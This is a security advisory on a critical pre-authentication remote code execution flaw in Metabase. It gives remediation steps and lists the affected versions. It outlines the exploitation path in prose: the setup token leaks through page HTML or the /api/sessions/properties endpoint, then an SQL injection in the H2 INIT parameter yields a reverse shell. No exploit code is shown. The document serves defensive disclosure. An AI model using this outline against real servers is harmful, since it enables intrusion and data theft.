Critical Flaw reported in Metabase Business Intelligence
Take action: If you are using Metabase, first and immediate action is to remove the setup token and to lock it down not to be visible from the internet without a VPN or similar authentication mechanism. Then plan for a patch. A BI system patch may not be trivial, so do some testing first.
Learn More
A Critical Remote Code Execution (RCE) vulnerability was discovered in Metabase, a widely-used open-source business intelligence tool that allows users to create charts and dashboards using various databases and data sources. This RCE flaw could potentially allow hackers to infiltrate servers running Metabase and execute unauthorized commands.
More than 20,000 instances of Metabase were found to be exposed to the internet. Since BI systems are connected to important and large databases, this exposure and vulnerability mean that sensitive data sources connected to these Metabase instances are at risk of being compromised by attackers.
The vulnerability revolves around the setup token used during the initial configuration of Metabase instances. This token is intended to be used only once and then erased after the setup process is completed. However, it was found that in some instances, the setup token remained accessible to unauthenticated users through various means, such as being present in the HTML source of the index/login page or being exposed via the /api/sessions/properties endpoint without requiring authentication.
The presence of the setup token allowed researchers to achieve pre-auth RCE on these vulnerable Metabase instances. Additionally, an SQL injection flaw was discovered in the H2 db driver used by Metabase, specifically in the INIT parameter, which is an SQL query for initiating the database connection. This SQL injection provided a way for attackers to execute malicious commands and gain unauthorized access.
By combining these vulnerabilities, attackers were able to create a reverse shell, a mechanism that allows remote access to the server and the extraction of sensitive information from the data sources connected to the compromised Metabase instances.
The vulnerable versions of Metabase were identified as
- v0.45.4.1,
- v1.45.4.1,
- v0.44.7.1,
- v1.44.7.1,
- v0.43.7.2,
- v1.43.7.2.
The Metabase development team has since released patches to address these vulnerabilities and has strongly advised all users to upgrade to the latest versions to safeguard against potential exploits.
